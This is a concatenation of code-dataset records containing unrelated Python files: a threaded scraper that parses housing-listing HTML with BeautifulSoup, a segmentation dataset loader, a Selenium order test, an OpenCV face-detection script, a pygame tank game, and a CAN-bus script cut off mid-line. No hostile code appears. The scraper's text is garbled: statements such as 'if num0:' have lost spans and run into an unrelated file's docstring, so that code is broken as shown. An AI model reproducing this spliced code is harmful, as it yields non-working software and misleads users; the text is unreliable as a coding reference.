self.house_detail_info_queue=queue.Queue()\n        self.house_files={} #{regin:[house1,house2]}\n        self.house_files_queue=queue.Queue()\n        self.house_file_page_queue=queue.Queue()\n\n        self.house_info_queue=queue.Queue()\n\n    def load_house_file(self):\n        file_name=self.houe_file_root+'/update_url.csv'\n        print(file_name)\n        with open(file_name) as f:\n            csv_file=csv.reader(f)\n            for row in csv_file:\n                if row[1] in self.house_files:\n                    self.house_files[row[1]].append(row[0])\n                else:\n                    data=[]\n                    data.append(row[0])\n                    self.house_files[row[1]]=data\n\n\n    def get_house_file(self,level=0,data='',path=''):\n        if len(path)==0:\n            path=self.houe_file_root\n        dir_or_files = os.listdir(path)\n        for dir_file in dir_or_files:\n            dir_file_path = os.path.join(path,dir_file)\n            if os.path.isdir(dir_file_path):\n                if level==0:\n                    data=dir_file\n                if dir_file=='url_detail_page':\n
self.house_files[data]=[]\n \n file_level=level+1\n self.get_house_file(file_level,data,dir_file_path)\n \n else:\n if dir_file_path.find('.html')!=-1:\n if len(data)>0:\n if data in self.house_files:\n file_list=self.house_files[data]\n file_list.append(dir_file_path)\n print(dir_file_path)\n \n def __get_house_page__(self,id):\n '''\n extract all href of house page and save it to house_detail_info_url\n '''\n \n i=0\n while True:\n data=self.house_files_queue.get(block=False)\n i=i+1\n self.house_files_queue.task_done()\n \n try:\n page=self.__read_file__(data.house_file)\n data.house_page=page\n self.house_file_page_queue.put(data)\n except:\n print('__get_house_page__ unknown except')\n return False\n if self.house_files_queue.empty():\n break;\n\n self.log.debug('get house page thread{}: executor {} task done'.format(id,i))\n return True\n\n def __read_file__(self,file_name):\n with open(file_name, 'r') as f:\n page=f.read()\n return page\n \n \n def construct_house_infos(self): \n start=time.time()\n\n for (key, value) in self.house_files.items():\n for val in value:\n house_data=HouseData()\n house_data.region=key\n house_data.house_file=val\n print(house_data.to_string())\n self.house_files_queue.put(house_data)\n \n thread_num=int(self.config.get('thread','get_house_detail_page_thread_num'))\n num=self.house_files_queue.qsize()\n if num==0:\n return\n if num0:\n houseids=names[len(names)-1].split('.')\n\n house_info=HouseInfo()\n house_info.region=data.region\n if len(houseids)>1:\n house_info.house_id=houseids[0]\n house_detail=house_info.house_detail\n \n soup=BeautifulSoup(page,'lxml')\n for di in soup.find(class_=\"transaction\").children:\n if di.name=='div':\n if di['class'][0]=='content':\n for ul in di.children:\n if ul.name=='ul':\n for span in ul.children:\n if span.name=='li':\n for d in span.children:\n if d.name=='span':\n if d.string!='挂牌时间':\n house_info.publish_time=d.string\n break \n \n for di in soup.find(class_=\"sellDetailHeader\").children:\n if di.name=='div':\n for ul in di.children:\n if ul.name=='div':\n for ul2 in ul.children:\n if ul2.name=='div':\n for ul3 in ul2.children:\n if ul3.name=='div':\n for ul4 in ul3.children:\n if ul4.name=='div':\n if ul4['class'][0]=='action':\n for ul5 in ul4.children:\n if ul5.name=='span':\n if ul5['class'][0]=='count':\n house_info.focus_num=ul5.string\n \n break\n \n \n for div in soup.find(class_=\"overview\").children:\n if div['class'][0]=='content':\n for item in div.children:\n \n if item['class'][0]=='price':\n for span in item.children:\n if span['class'][0]=='total':\n house_detail.total_price=span.string\n if span['class'][0]=='text':\n for div in span.children:\n if div['class'][0]=='unitPrice':\n for span in div.children:\n if span['class'][0]=='unitPriceValue':\n for str in span.strings:\n house_detail.average_price=str\n break;\n if item['class'][0]=='aroundInfo':\n for div in item.children:\n if div['class'][0]=='communityName':\n \n for di in div.children:\n if di.name=='a':\n if di['class'][0]=='info':\n house_info.neighborhodd_name=di.string\n \n if item['class'][0]=='houseInfo':\n for div in item.children:\n if div['class'][0]=='area':\n for div2 in div.children:\n if div2['class'][0]=='mainInfo':\n house_detail.area=div2.string\n if div['class'][0]=='room':\n for div2 in div.children:\n if div2['class'][0]=='mainInfo':\n house_detail.layout=div2.string\n if div['class'][0]=='type':\n for div2 in div.children:\n if div2['class'][0]=='subInfo':\n house_detail.dress=div2.string \n if 
div2['class'][0]=='mainInfo':\n house_detail.tongtou=div2.string \n self.house_info_queue.put(house_info)\n if house_info.neighborhodd_name in house_detail_dict:\n house_detail_dict[house_info.neighborhodd_name].append(house_info)\n else:\n house_info_list=[]\n house_info_list.append(house_info)\n house_detail_dict[house_info.neighborhodd_name]=house_info_list\n print(house_info.to_string())\n\n \n #print(house_info.to_string())\n\n if self.house_file_page_queue.empty():\n break;\n\n self.log.debug('extract house detail thread{}:executor {} task'.format(id,i))\n return house_detail_dict\n \n def extract_house_detail(self):\n start=time.time()\n thread_num=int(self.config.get('thread','extract_house_detail_thread_num'))\n num=self.house_file_page_queue.qsize()\n if num==0:\n return\n if num Argparse: global arguments\"\"\"\r\n t_train = SegTransformCompose(RandomCrop(args.crop), Resize(size=args.size), HFlip(0.5),\r\n AdjustBrightness(0.5), AdjustContrast(0.5),\r\n AdjustSaturation(0.5), ToTensor(),\r\n Normalize(mean=args.mean, std=args.std)\r\n )\r\n\r\n t_eval = SegTransformCompose(Resize(size=args.size),\r\n ToTensor(),\r\n Normalize(mean=args.mean, std=args.std)\r\n )\r\n\r\n if args.data == \"CamVid\":\r\n train_set = CamVid(args.dset_folder, split=\"train\", transforms=t_train)\r\n val_set = CamVid(args.dset_folder, split=\"val\", transforms=t_eval)\r\n test_set = CamVid(args.dset_folder, split=\"test_ood\", transforms=t_eval)\r\n\r\n elif args.data == \"StreetHazard\":\r\n train_set = StreetHazard(args.dset_folder, split=\"train\", transforms=t_train)\r\n val_set = StreetHazard(args.dset_folder, split=\"validation\", transforms=t_eval)\r\n test_set = StreetHazard(args.dset_folder, split=\"test\", transforms=t_eval)\r\n\r\n elif args.data == \"BddAnomaly\":\r\n train_set = BddAnomaly(args.dset_folder, split=\"train\", transforms=t_train)\r\n val_set = BddAnomaly(args.dset_folder, split=\"validation\", transforms=t_eval)\r\n test_set = BddAnomaly(args.dset_folder, split=\"test\", transforms=t_eval)\r\n\r\n else:\r\n raise NameError('Unknown dataset')\r\n\r\n train_loader = DataLoader(train_set, batch_size=args.bsize, num_workers=args.num_workers,\r\n pin_memory=True, drop_last=True, shuffle=True)\r\n\r\n val_loader = DataLoader(val_set, batch_size=args.bsize, num_workers=args.num_workers,\r\n pin_memory=True, drop_last=True, shuffle=True)\r\n\r\n test_loader = DataLoader(test_set, batch_size=1, num_workers=args.num_workers,\r\n pin_memory=True)\r\n\r\n return train_loader, val_loader, test_loader\r\n","sub_path":"Datasets/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"52704049","text":"import unittest\nfrom selenium import webdriver\nimport orders_po\nfrom input_parameters import *\nimport sys\nsys.path.append(\"tests\")\n\n\nclass BuySomething(unittest.TestCase):\n\n def setUp(self):\n self.driver = webdriver.Chrome()\n self.parameters = TestShopParameters\n self.base_url = self.parameters.BASE_URL\n\n def test_new_order(self):\n driver = self.driver\n driver.get(self.base_url)\n\n newOrder = orders_po.Order(driver)\n newOrder.shopTShorts()\n newOrder.chooseParticular()\n newOrder.addToCart()\n newOrder.proceedToCheckout()\n newOrder.enterAccount(self.parameters.ORDER_EMAIL, self.parameters.ORDER_PASSWORD)\n newOrder.loginInto()\n newOrder.chooseAddress()\n newOrder.shippingMethod()\n newOrder.paymentMethod()\n newOrder.sendOrder()\n 
newOrder.checkOrderStatus(self.parameters.ORDER_MESSAGE)\n\n def tearDown(self):\n self.driver.quit()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test_place_order.py","file_name":"test_place_order.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"298715080","text":"import cv2 as cv\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport time\n\n\ndef show1(imagen):\n plt.imshow(imagen, cmap=\"gray\")\n plt.axis(\"off\")\n plt.show()\n\n\ndef show2(image1, image2):\n plt.figure(1, figsize=(15, 20))\n plt.subplot(211)\n plt.imshow(image1, cmap=\"gray\")\n plt.axis(\"off\")\n\n plt.subplot(212)\n plt.imshow(image2, cmap=\"gray\")\n plt.axis(\"off\")\n plt.show()\n\n\n# photo = cv.imread('letras.jpg')\n# # show1(photo)\n#\n# photo_gris = cv.cvtColor(photo, cv.COLOR_BGR2GRAY)\n# # show2(photo_gris, photo)\ncascade_path = 'haarcascade_frontalface_default.xml'\nclassifier = cv.CascadeClassifier(cascade_path)\n# faces_detected = classifier.detectMultiScale(photo_gris,\n# scaleFactor=1.163145,\n# minNeighbors=1,\n# flags=cv.CASCADE_SCALE_IMAGE,\n# minSize=(60, 60),\n# maxSize=(100, 100))\n#\n#\n# for(x, y, l, a) in faces_detected:\n# photo = cv.rectangle(photo, (x, y), (x+l, y+a), (212, 172, 13), 2)\n# region_gaussian = cv.GaussianBlur(photo[y:y+l, x:x+a], (11, 11), 13)\n# photo[y:y + l, x:x + a] = region_gaussian\n#\n#\n# show1(photo)\n# region_mean = cv.medianBlur(photo[y:y+l, x:x+a], 15)\n# photo[y:y + l, x:x + a] = region_mean\n\n# photo2_gray = cv.cvtColor(photo, cv.COLOR_BGR2GRAY)\n# faces_detected2 = classifier.detectMultiScale(photo2_gray, scaleFactor=1.163145, minNeighbors=1, minSize=(60, 60),\n# maxSize=(100, 100))\n#\n# for(x, y, l, a) in faces_detected:\n# photo = cv.rectangle(photo, (x, y), (x+l, y+a), (212, 172, 13), 2)\n# # region_gaussian = cv.GaussianBlur(photo[y:y+l, x:x+a], (23, 23), 13)\n# # photo[y:y + l, x:x + a] = region_gaussian\n#\n# show1(photo)\n# time.sleep(2)\n\n# Second part\nphoto2 = cv.imread('letras.jpg')\nphoto2_gray = cv.cvtColor(photo2, cv.COLOR_BGR2GRAY)\nfaces_detected2 = classifier.detectMultiScale(photo2_gray,\n scaleFactor=1.163145,\n minNeighbors=1,\n minSize=(60, 60),\n maxSize=(100, 100))\n\n\ndef rotate_image(image, angle):\n image_center = tuple(np.array(image.shape[1::-1]) / 2)\n rot_mat = cv.getRotationMatrix2D(image_center, angle, 1.0)\n result = cv.warpAffine(image, rot_mat, image.shape[1::-1], flags=cv.INTER_LINEAR)\n return result\n\n\nfor(x, y, l, a) in faces_detected2:\n photo2 = cv.rectangle(photo2, (x, y), (x+l, y+a), (212, 172, 13), 2)\n region = photo2[y:y+l, x:x+a]\n region = rotate_image(region, 180)\n time.sleep(2)\n photo2[y:y + l, x:x + a] = region\n\nshow1(photo2)\n","sub_path":"src/w3_detectface.py","file_name":"w3_detectface.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"627948824","text":"import pygame\nimport math\nfrom random import random, choice\n\n\n# Классы игровых объектов\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n # начальное положение игрока\n self.speed = 120 # скорость пискелей в секунду\n\n self.image = pygame.image.load('Sprites/forward/forward7.PNG')\n self.image.set_colorkey((255, 255, 255))\n self.load_images()\n self.last_anim = 0\n\n self.rect = self.image.get_rect()\n self.rect.center = (640, 860)\n self.lastRect_x = self.rect.x\n 
self.lastRect_y = self.rect.y\n\n self.lastKey = ''\n\n self.hp = 20 # хп танка (уничтожение от 4 попаданий, урон снарядом противника - 5 хп)\n self.sp = self.speed // 60\n\n def load_images(self):\n self.player_anim_forward = []\n for i in range(1, 9):\n self.player_anim_forward.append(pygame.image.load('Sprites/forward/forward{id}.png'.format(id=str(i))))\n self.player_anim_forward.reverse()\n\n self.player_anim_back = []\n for i in range(1, 9):\n self.player_anim_back.append(pygame.image.load('Sprites/back/back{id}.png'.format(id=str(i))))\n\n self.player_anim_left = []\n for i in range(1, 9):\n self.player_anim_left.append(pygame.image.load('Sprites/left/left{id}.png'.format(id=str(i))))\n self.player_anim_left.reverse()\n\n self.player_anim_right = []\n for i in range(1, 9):\n self.player_anim_right.append(pygame.image.load('Sprites/right/right{id}.png'.format(id=str(i))))\n self.player_anim_right.reverse()\n\n def check_anim(self):\n self.last_anim += 1\n if self.last_anim == 8:\n self.last_anim = 0\n\n def update(self):\n # изменение координат игрока в зависимости от кнопки\n key = pygame.key.get_pressed()\n\n if key[pygame.K_w]:\n self.rect.y -= self.sp\n self.image = self.player_anim_forward[self.last_anim]\n self.check_anim()\n self.lastKey = 'w'\n elif key[pygame.K_s]:\n self.rect.y += self.sp\n self.image = self.player_anim_back[self.last_anim]\n self.check_anim()\n self.lastKey = 's'\n elif key[pygame.K_d]:\n self.rect.x += self.sp\n self.image = self.player_anim_right[self.last_anim]\n self.check_anim()\n self.lastKey = 'd'\n elif key[pygame.K_a]:\n self.rect.x -= self.sp\n self.image = self.player_anim_left[self.last_anim]\n self.check_anim()\n self.lastKey = 'a'\n\n self.lastRect_x = self.rect.x\n self.lastRect_y = self.rect.y\n self.check_border()\n\n def shoot(self):\n\n bullet = Bullet(self.rect.centerx, self.rect.top, 'w')\n if self.lastKey == 'w':\n bullet = Bullet(self.rect.centerx, self.rect.top, self.lastKey)\n elif self.lastKey == 's':\n bullet = Bullet(self.rect.centerx, self.rect.bottom, self.lastKey)\n elif self.lastKey == 'a':\n bullet = Bullet(self.rect.centerx - 30, self.rect.y + 30, self.lastKey, notSide=False)\n elif self.lastKey == 'd':\n bullet = Bullet(self.rect.centerx + 30, self.rect.y + 30, self.lastKey, notSide=False)\n all_sprites.add(bullet)\n player_bullets.add(bullet)\n\n def check_border(self, is_collided=False):\n if is_collided is False:\n if self.rect.left + self.sp < 260:\n self.rect.left = 260\n if self.rect.right + self.sp > 1040:\n self.rect.right = 1040\n if self.rect.top + self.sp < 0:\n self.rect.top = 0\n if self.rect.bottom + self.sp > 1000:\n self.rect.bottom = 1000\n\n if pygame.sprite.spritecollide(self, landscape, False) or \\\n pygame.sprite.spritecollide(self, iron_landscape, False):\n # игрок не движется при столкновении с препятствием так как из его координат вычитается скорость\n if self.lastKey == 'w':\n self.rect.y = self.rect.y + self.sp\n elif self.lastKey == 's':\n self.rect.y = self.rect.y - self.sp\n elif self.lastKey == 'a':\n self.rect.x = self.rect.x + self.sp\n elif self.lastKey == 'd':\n self.rect.x = self.rect.x - self.sp\n\n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, x, y, direction, notSide=True):\n pygame.sprite.Sprite.__init__(self)\n self.dir = direction\n\n if notSide is False:\n self.image = pygame.Surface((15, 10))\n else:\n self.image = pygame.Surface((10, 20))\n self.image.fill((255, 255, 0))\n self.rect = self.image.get_rect()\n self.rect.center = (x, y)\n self.speed = 20\n\n def 
update(self):\n if self.dir == 'w':\n self.rect.y -= self.speed\n elif self.dir == 's':\n self.rect.y += self.speed\n elif self.dir == 'a':\n self.rect.x -= self.speed\n elif self.dir == 'd':\n self.rect.x += self.speed\n\n if self.rect.left < 0 or self.rect.right > 1280 or \\\n self.rect.top < 0 or self.rect.bottom > 1000:\n self.kill()\n\n\nclass Enemy(Player):\n def __init__(self):\n global player_base, landscape, player, way\n pygame.sprite.Sprite.__init__(self)\n self.speed = 110 # скорость пискелей в секунду\n self.is_ready_to_shoot = False\n self.cooldown = 0\n self.sp = self.speed // 60\n self.lastdir = 's'\n self.target_to_move = [640, 960]\n self.direction = choice(['r', 'l'])\n self.last_anim = 0\n self.alarm = False\n self.see_player = True\n\n self.load_images()\n self.image = pygame.image.load('Sprites/forward/forward7.PNG')\n self.image = pygame.transform.scale(self.image, (60, 60))\n self.rect = self.image.get_rect()\n self.rect.center = (630, 40)\n self.rect.inflate_ip(-20, 0)\n\n self.image.set_colorkey((255, 255, 255))\n\n self.hp = 15\n\n def load_images(self):\n self.player_anim_forward = []\n for i in range(1, 9):\n self.player_anim_forward.append(pygame.image.load('Sprites/forward/forward{id}.png'.format(id=str(i))))\n self.player_anim_forward.reverse()\n\n self.player_anim_back = []\n for i in range(1, 9):\n self.player_anim_back.append(pygame.image.load('Sprites/back/back{id}.png'.format(id=str(i))))\n\n self.player_anim_left = []\n for i in range(1, 9):\n self.player_anim_left.append(pygame.image.load('Sprites/left/left{id}.png'.format(id=str(i))))\n self.player_anim_left.reverse()\n\n self.player_anim_right = []\n for i in range(1, 9):\n self.player_anim_right.append(pygame.image.load('Sprites/right/right{id}.png'.format(id=str(i))))\n self.player_anim_right.reverse()\n\n def update(self):\n # рассчет дистанции до базы игрока и до самого игрока\n\n base_x, base_y = player_base.rect.x - self.rect.x, player_base.rect.y - self.rect.y\n player_x, player_y = player.rect.x - self.rect.x, player.rect.y - self.rect.y\n distance = math.hypot(base_x, base_y)\n distance_to_player = math.hypot(player_x, player_y)\n\n self.mask = pygame.mask.from_surface(self.image)\n if distance_to_player > 300 and (self.rect.right != self.rect.centerx or \\\n self.rect.centery != player.rect.centery):\n # движение к базе\n self.alarm = False\n if self.target_to_move[1] != self.rect.centery:\n if self.sp != 0:\n print(self.target_to_move)\n if self.rect.x > self.target_to_move[0]:\n self.image = self.player_anim_left[self.last_anim]\n self.check_anim()\n self.rect.x -= self.sp\n self.lastdir = 'a'\n elif self.rect.x < self.target_to_move[0]:\n self.image = self.player_anim_right[self.last_anim]\n self.check_anim()\n self.rect.x += self.sp\n self.lastdir = 'd'\n elif self.rect.y < self.target_to_move[1]:\n self.image = self.player_anim_back[self.last_anim]\n self.check_anim()\n self.rect.y += self.sp\n self.lastdir = 's'\n elif self.rect.y > self.target_to_move[1]:\n self.image = self.player_anim_forward[self.last_anim]\n self.check_anim()\n self.rect.y -= self.sp\n self.lastdir = 'w'\n else:\n pass\n else:\n self.target_to_move = player_base.rect.center\n if distance > 200:\n if self.rect.x > self.target_to_move[0]:\n self.image = self.player_anim_left[self.last_anim]\n self.check_anim()\n self.rect.x -= self.sp\n self.lastdir = 'a'\n elif self.rect.x < self.target_to_move[0]:\n self.image = self.player_anim_right[self.last_anim]\n self.check_anim()\n self.rect.x += self.sp\n self.lastdir = 
'd'\n else:\n self.shoot()\n self.check_collide()\n else:\n self.alarm = True\n if self.rect.x > player.rect.x:\n self.image = self.player_anim_left[self.last_anim]\n self.check_anim()\n self.rect.x -= self.sp\n self.lastdir = 'a'\n elif self.rect.x < player.rect.x:\n self.image = self.player_anim_right[self.last_anim]\n self.check_anim()\n self.rect.x += self.sp\n self.lastdir = 'd'\n self.shoot()\n self.check_collide()\n\n def shoot(self):\n if not self.cooldown:\n if self.lastdir == 'w':\n bullet = Bullet(self.rect.centerx - 7, self.rect.top, self.lastdir)\n elif self.lastdir == 's':\n bullet = Bullet(self.rect.centerx + 7, self.rect.bottom, self.lastdir)\n elif self.lastdir == 'a':\n bullet = Bullet(self.rect.centerx - 30, self.rect.y + 30, self.lastdir, notSide=False)\n elif self.lastdir == 'd':\n bullet = Bullet(self.rect.centerx + 30, self.rect.y + 30, self.lastdir, notSide=False)\n all_sprites.add(bullet)\n enemy_bulltes.add(bullet)\n self.cooldown = 50\n else:\n self.cooldown -= 1\n\n def check_collide(self):\n wall = pygame.sprite.spritecollide(self, landscape, False)\n iron = pygame.sprite.spritecollide(self, iron_landscape, False)\n\n if wall:\n print('wall')\n self.sp = 0\n if self.alarm:\n self.rect.y -= 10\n self.sp = self.speed // 60\n return\n self.shoot()\n else:\n self.sp = self.speed // 60\n self.alarm = False\n\n if iron:\n self.rect.y -= 15\n if self.direction == 'r':\n if self.target_to_move[0] + 30 < 1280:\n self.target_to_move[0] += 30\n elif self.direction == 'l':\n if self.target_to_move[0] - 40 > 0:\n self.target_to_move[0] -= 40\n print('iron')\n\n if pygame.sprite.spritecollide(player, bushes, False):\n self.see_player = False\n else:\n self.see_player = True\n\n if pygame.sprite.spritecollide(self, players, False):\n self.shoot()\n\n\nclass Player_base(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.hp = 15\n\n self.image = pygame.image.load('Sprites/base.PNG')\n self.rect = self.image.get_rect()\n self.rect.center = (642, 960)\n\n def update(self):\n global running\n if self.hp == 0:\n running = False\n game_menu()\n\n\nclass Iron(pygame.sprite.Sprite):\n def __init__(self, start_x, start_y):\n pygame.sprite.Sprite.__init__(self)\n\n self.image = pygame.image.load('Sprites/железная стенка.png')\n self.rect = self.image.get_rect()\n self.rect.center = (start_x, start_y)\n self.image.set_colorkey((255, 255, 255))\n\n def update(self):\n if pygame.sprite.spritecollide(self, player_bullets, True) or \\\n pygame.sprite.spritecollide(self, enemy_bulltes, True):\n pass\n\n\nclass Bush(pygame.sprite.Sprite):\n def __init__(self, start_x, start_y):\n pygame.sprite.Sprite.__init__(self)\n\n self.image = pygame.image.load('Sprites/кустик.png')\n self.rect = self.image.get_rect()\n self.rect.center = (start_x, start_y)\n self.image.set_colorkey((255, 255, 255))\n\n\nclass Wall(pygame.sprite.Sprite):\n def __init__(self, start_x, start_y):\n pygame.sprite.Sprite.__init__(self)\n\n self.image = pygame.image.load('Sprites/brick.png')\n self.rect = self.image.get_rect()\n self.rect.center = (start_x, start_y)\n self.image.set_colorkey((255, 255, 255))\n self.hp = 20\n\n def update(self):\n if pygame.sprite.spritecollide(self, enemy_bulltes, True) or \\\n pygame.sprite.spritecollide(self, player_bullets, True):\n self.hp -= 5\n if self.hp == 15:\n self.image = pygame.image.load('Sprites/first.png')\n elif self.hp == 10:\n self.image = pygame.image.load('Sprites/second.png')\n elif self.hp == 5:\n self.image = 
pygame.image.load('Sprites/third_2.png')\n elif self.hp == 0:\n self.kill()\n\n\ndef check_collide():\n global running, player, enemy, player_base, explosion\n # проверки на попадания пуль и на столкновения с объектами\n if pygame.sprite.groupcollide(enemies, player_bullets, False, True):\n enemy.hp -= 5\n if enemy.hp == 0:\n for i in range(3):\n enemy.image = explosion[i]\n enemy.kill()\n enemies.remove(enemy)\n all_sprites.remove(enemy)\n\n if pygame.sprite.spritecollide(player_base, enemy_bulltes, True):\n player_base.hp -= 5\n if player_base.hp == 0:\n for i in range(3):\n player_base.image = explosion[i]\n all_sprites.remove(player_base)\n running = False\n\n if pygame.sprite.spritecollide(player, enemy_bulltes, True):\n player.hp -= 5\n if player.hp == 0:\n for i in range(3):\n player.image = explosion[i]\n running = False\n\n if pygame.sprite.groupcollide(player_bullets, iron_landscape, True, False) or \\\n pygame.sprite.groupcollide(enemy_bulltes, iron_landscape, True, False):\n pass\n\n\ndef print_text(message, x, y, font_color=(0, 0, 0), font_size=30):\n font_type = pygame.font.SysFont('arial', font_size)\n text = font_type.render(message, True, font_color)\n screen.blit(text, (x, y))\n\n\nclass Button():\n def __init__(self, width, height, message):\n self.message = message\n self.width = width\n self.height = height\n self.inactive_clr = (136, 69, 53)\n self.active_clr = (120, 50, 40)\n\n def draw(self, x, y, message, font_size=30, action=None, button_sound=None):\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n\n if x < mouse[0] < x + self.width and y < mouse[1] < y + self.height:\n pygame.draw.rect(screen, self.active_clr, (x, y, self.width, self.height))\n\n if click[0] == 1:\n pygame.time.delay(300)\n if action is not None:\n if action == quit:\n pygame.quit()\n quit()\n else:\n action()\n\n else:\n pygame.draw.rect(screen, self.inactive_clr, (x, y, self.width, self.height))\n\n print_text(message=self.message, x=x + 10, y=y + 10, font_size=font_size)\n\n\ndef game_menu():\n size = width, height = 600, 500\n screen = pygame.display.set_mode(size)\n menu = pygame.image.load('Sprites/логотип.png')\n menu = pygame.transform.scale(menu, (381, 241))\n menu.set_colorkey((255, 255, 255))\n\n button_for_start = Button(250, 70, 'Start')\n button_for_quit = Button(120, 70, 'Exit')\n\n show = True\n\n while show:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n\n screen.blit(menu, (150, 35))\n button_for_start.draw(170, 320, 'Начать игру', action=start_game)\n button_for_quit.draw(230, 400, 'Выйти из игры', action=quit)\n\n pygame.display.update()\n pygame.display.flip()\n clock.tick(60)\n\n\ndef load_map():\n global landscape, all_sprites, iron_poses\n landscape_pos = {\n 0: [650, 500], 1: [590, 500], 2: [710, 500], 3: [770, 560], 4: [830, 560], 5: [890, 560], 6: [890, 500],\n 7: [890, 440], 8: [830, 440], 9: [770, 440], 10: [290, 740], 11: [950, 500], 12: [1010, 500], 13: [1010, 560],\n 14: [1010, 440], 15: [410, 560], 16: [530, 560],\n 17: [470, 560], 18: [410, 560], 19: [470, 440], 20: [530, 440], 21: [410, 440], 22: [410, 500], 23: [350, 500],\n 24: [290, 500], 25: [290, 440], 26: [290, 560],\n 27: [290, 260], 28: [410, 260], 29: [530, 260], 30: [650, 260], 31: [770, 260], 32: [890, 260], 33: [1010, 260],\n 34: [1010, 740], 35: [890, 740], 36: [770, 740],\n 37: [650, 740], 38: [530, 740], 39: [410, 740]\n }\n bush_pos = {0: [290, 620], 1: [350, 620], 2: [350, 560], 3: [410, 620], 4: [470, 620], 5: [530, 620], 6: 
[590, 620],\n 7: [650, 620], 8: [710, 620], 9: [770, 620],\n 10: [830, 620], 11: [890, 620], 12: [950, 620], 13: [950, 560], 14: [1010, 620], 15: [290, 380],\n 16: [350, 380],\n 17: [350, 440], 18: [410, 380], 19: [470, 380], 20: [530, 380], 21: [590, 380],\n 22: [650, 380], 23: [710, 380], 24: [770, 380], 25: [830, 380], 26: [890, 380],\n 27: [950, 380], 28: [950, 440], 29: [1010, 380]\n }\n iron_pos = {0: [650, 560], 1: [710, 560], 2: [590, 560], 3: [650, 440], 4: [710, 440], 5: [590, 440], 6: [770, 500],\n 7: [830, 500], 8: [530, 500], 9: [470, 500], 10: [350, 260],\n 11: [470, 260], 12: [0, 0], 13: [0, 0], 14: [830, 260], 15: [950, 260],\n 16: [350, 740], 17: [470, 740], 18: [590, 740], 19: [710, 740], 20: [830, 740],\n 21: [950, 740]\n }\n\n for a in range(40):\n wall = Wall(landscape_pos[a][0], landscape_pos[a][1])\n landscape.add(wall)\n all_sprites.add(wall)\n for a in range(30):\n bush = Bush(bush_pos[a][0], bush_pos[a][1])\n bushes.add(bush)\n all_sprites.add(bush)\n for a in range(22):\n iron_wall = Iron(iron_pos[a][0], iron_pos[a][1])\n iron_landscape.add(iron_wall)\n all_sprites.add(iron_wall)\n\n\ndef start_game():\n global clock\n running = True\n fps = 60\n waves = 5\n size = width, height = 1280, 1000\n screen = pygame.display.set_mode(size)\n player_cooldown = pygame.USEREVENT + 2\n cooldown_shoot = False\n\n load_map()\n\n pygame.time.set_timer(player_cooldown, 1000)\n\n rect_color = (255, 0, 0)\n\n while running:\n clock.tick(fps)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n game_menu()\n\n if event.type == player_cooldown:\n cooldown_shoot = False\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_SPACE and cooldown_shoot is False:\n player.shoot()\n pygame.time.set_timer(player_cooldown, 1000)\n cooldown_shoot = True\n\n elif event.key == pygame.K_ESCAPE:\n running = False\n game_menu()\n\n all_sprites.update()\n if len(enemies) == 0 and waves != 0:\n enemy = Enemy()\n enemies.add(enemy)\n all_sprites.add(enemy)\n waves -= 1\n check_collide()\n\n screen.fill((0, 0, 0))\n all_sprites.draw(screen)\n # pygame.draw.rect(screen, rect_color, enemy.rect)\n pygame.display.flip()\n\n for i in range(1, 4):\n explosion.append((pygame.image.load('Sprites/explosion/explosion{id}.png'.format(id=str(i)))))\n\n pygame.time.set_timer(player_cooldown, 1000)\n while running:\n clock.tick(fps)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n if event.type == player_cooldown:\n cooldown_shoot = False\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_SPACE and cooldown_shoot is False:\n player.shoot()\n pygame.time.set_timer(player_cooldown, 1000)\n cooldown_shoot = True\n\n all_sprites.update()\n if len(enemies) == 0 and waves != 0:\n if waves != 5:\n enemy = Enemy()\n enemies.add(enemy)\n all_sprites.add(enemy)\n waves -= 1\n else:\n print('BOOOOOOOOOOOOOSS!')\n enemy = Enemy()\n enemy.hp = 30\n check_collide()\n\n screen.fill((0, 0, 0))\n all_sprites.draw(screen)\n pygame.display.flip()\n\n\npygame.init()\nrunning = True\nfps = 60\nsize = width, height = 600, 800\nclock = pygame.time.Clock()\nscreen = pygame.display.set_mode(size)\nwaves = 5\nall_sprites = pygame.sprite.Group()\nlandscape = pygame.sprite.Group()\nplayer_bullets = pygame.sprite.Group()\nenemy_bulltes = pygame.sprite.Group()\nenemies = pygame.sprite.Group()\nplayers = pygame.sprite.Group()\niron_landscape = pygame.sprite.Group()\nbushes = pygame.sprite.Group()\n\nplayer = Player()\nplayers.add(player)\nenemy = 
Enemy()\nplayer_base = Player_base()\nenemies.add(enemy)\n\nall_sprites.add(player)\nall_sprites.add(enemy)\nlandscape.add(player_base)\nall_sprites.add(player_base)\nexplosion = []\n\nfor i in range(1, 4):\n explosion.append((pygame.image.load('Sprites/explosion/explosion{id}.png'.format(id=str(i)))))\n\ngame_menu()\n","sub_path":"Main_script.py","file_name":"Main_script.py","file_ext":"py","file_size_in_byte":23237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"649146963","text":"#!/usr/bin/python3\n#\n# simple_rx_test.py\n# \n# This is simple CAN receive python program. All messages received are printed out on screen.\n# For use with PiCAN boards on the Raspberry Pi\n# http://skpang.co.uk/catalog/pican2-canbus-board-for-raspberry-pi-2-p-1475.html\n#\n# Make sure Python-CAN is installed first http://skpang.co.uk/blog/archives/1220\n#\n# 01-02-16 SK Pang\n#\n#\n#\n\nimport can\nimport time\nimport os\nfrom dotstar import Adafruit_DotStar\n\nnumpixels = 77\nbrightness = 128\n\ndatapin = 23\nclockpin = 24\n\nprint('\\n\\rCAN Rx test')\nprint('Bring up CAN0....')\nos.system(\"sudo /sbin/ip link set can0 up type can bitrate 